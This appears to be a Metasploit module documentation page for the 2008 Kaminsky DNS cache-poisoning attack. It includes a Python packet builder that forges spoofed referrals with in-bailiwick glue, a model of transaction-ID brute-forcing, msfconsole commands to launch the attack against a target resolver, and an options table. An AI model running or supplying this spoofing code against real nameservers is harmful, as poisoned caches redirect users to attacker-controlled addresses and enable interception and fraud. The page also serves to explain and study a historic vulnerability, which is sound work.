DNS BailiWicked Host Attack
This module attacks a widespread flaw in DNS resolver implementations that Dan Kaminsky found and disclosed around July 2008. It caches a single malicious host entry in the target nameserver by sending the target queries for random hostnames under the victim domain and, alongside each query, replies spoofed to appear to come from that domain's authoritative nameservers. Guessing is feasible because the target reuses a fixed source port for its outgoing queries (SRCPORT), so only the 16-bit transaction ID has to be brute-forced; each random hostname forces a fresh, uncached lookup and therefore a fresh chance to guess. Eventually a guessed ID matches, the spoofed reply is accepted, and because the additional record it carries is within the bailiwick of the original query, the malicious host entry is cached.
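As an added illustration (not code from the Metasploit module or from this page), the following Python builds the kind of spoofed reply the description refers to, using the referral layout from Kaminsky's disclosure: the authority section claims the victim zone is served by the hostname being hijacked, and the additional section supplies glue for that name pointing at the new address. A small model of the pre-fix acceptance rule then shows why that glue is cached (its owner name is inside the bailiwick of the queried zone) and why a record for an unrelated domain in the same reply would not be. The zone, hostname, address and TTL reuse the module's defaults; the random query label, the helper functions and the resolver model are assumptions for illustration and not the module's own code, and the packet builder writes uncompressed names only.

```python
import random
import struct

# Illustrative constants: the module's defaults plus one constructed random query label.
ZONE = "example.com"
HIJACKED = "pwned.example.com"          # module default HOSTNAME
NEW_ADDR = "1.3.3.7"                    # module default NEWADDR
TTL = 46047                             # module default TTL
RANDOM_QNAME = "a1b2c3d4.example.com"   # constructed: one of the random-hostname queries

def encode_name(name):
    """DNS wire-format name as uncompressed labels (no pointers)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def decode_name(data, offset):
    """Inverse of encode_name; returns (name, offset just past the name)."""
    labels = []
    while True:
        length = data[offset]
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length

def rr(name, rtype, rdata, ttl):
    """One resource record: NAME TYPE CLASS(IN) TTL RDLENGTH RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata

def build_spoofed_response(txid, qname, zone, hijacked, new_addr, ttl=TTL):
    """Forged referral sent as if from the zone's authoritative server.
    Authority:  <zone> NS <hijacked>   -- owner name is the zone itself, so in bailiwick
    Additional: <hijacked> A <new_addr> -- the glue the resolver will cache
    """
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 0, 1, 1)  # QR=1 AA=1; 1 Q, 0 AN, 1 NS, 1 AR
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    authority = rr(zone, 2, encode_name(hijacked), ttl)        # TYPE 2 = NS
    glue = rr(hijacked, 1, bytes(int(o) for o in new_addr.split(".")), ttl)  # TYPE 1 = A
    return header + question + authority + glue

def parse_response(pkt):
    """Parse a response from build_spoofed_response into (txid, qname, records)."""
    txid, _flags, _qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    qname, off = decode_name(pkt, 12)
    off += 4  # skip QTYPE, QCLASS
    records = []
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = decode_name(pkt, off)
            rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
            off += 10
            rdata = pkt[off:off + rdlen]
            off += rdlen
            if rtype == 1:
                value = ".".join(str(b) for b in rdata)
            elif rtype == 2:
                value, _ = decode_name(rdata, 0)
            else:
                value = rdata.hex()
            records.append((section, name, rtype, ttl, value))
    return txid, qname, records

def in_bailiwick(name, zone):
    """A record is in bailiwick when its owner name is the zone or lies beneath it."""
    name, zone = name.rstrip(".").lower(), zone.rstrip(".").lower()
    return name == zone or name.endswith("." + zone)

def resolver_accept(pkt, expected_txid, expected_qname, zone):
    """Model of the pre-2008 acceptance rule (an assumption, not any real resolver's code):
    the reply must match the outstanding query's TXID and question name; every authority
    and additional record whose owner is inside the zone's bailiwick is then cached."""
    txid, qname, records = parse_response(pkt)
    if txid != expected_txid or qname.lower() != expected_qname.lower():
        return {}
    return {(name, rtype): (value, ttl)
            for section, name, rtype, ttl, value in records
            if section != "answer" and in_bailiwick(name, zone)}

def rounds_until_txid_hit(guesses_per_query, seed=1):
    """Each random-hostname query forces a fresh lookup with a fresh 16-bit TXID, and the
    attacker answers it with `guesses_per_query` distinct forged TXIDs (the XIDS option).
    Returns how many rounds this seeded simulation needed before one guess matched."""
    rng = random.Random(seed)
    rounds = 0
    while True:
        rounds += 1
        real_txid = rng.getrandbits(16)
        if real_txid in set(rng.sample(range(65536), guesses_per_query)):
            return rounds

if __name__ == "__main__":
    pkt = build_spoofed_response(0x1234, RANDOM_QNAME, ZONE, HIJACKED, NEW_ADDR)
    print(resolver_accept(pkt, 0x1234, RANDOM_QNAME, ZONE))  # glue for pwned.example.com cached
    print(resolver_accept(pkt, 0x4321, RANDOM_QNAME, ZONE))  # wrong TXID: nothing cached
    print(rounds_until_txid_hit(256))
```

The out-of-bailiwick case is the one the fix in real resolvers already enforced before 2008: a forged reply to a random example.com name can carry glue for pwned.example.com, but glue for a name outside example.com is dropped, which is why the module hijacks a hostname under the victim's own zone rather than an arbitrary one.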
Rank
- Normal
Authors
- I)ruid < druid [at] caughq.org >
- hdm < hdm [at] metasploit.com >
Vulnerability References
Development
Similar Modules
Usage Information
$ msfconsole
msf > use auxiliary/spoof/dns/bailiwicked_host
msf auxiliary(bailiwicked_host) > set RHOST [TARGET IP]
msf auxiliary(bailiwicked_host) > set SRCPORT [PORT]
msf auxiliary(bailiwicked_host) > run
Module Options
| Option | Description |
| --- | --- |
| HOSTNAME | Hostname to hijack (default: pwned.example.com) |
| INTERFACE | The name of the interface |
| NEWADDR | New address for hostname (default: 1.3.3.7) |
| RECONS | The nameserver used for reconnaissance (default: 208.67.222.222) |
| RHOST | The target address |
| SNAPLEN | The number of bytes to capture (default: 65535) |
| SRCADDR | The source address to use for sending the queries (accepted: Real, Random) (default: Real) |
| SRCPORT | The target server's source query port (0 for automatic) |
| TIMEOUT | The number of seconds to wait for new data (default: 500) |
| TTL | The TTL for the malicious host entry (default: 46047) |
| XIDS | The number of XIDs to try for each query (0 for automatic) (default: 0) |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
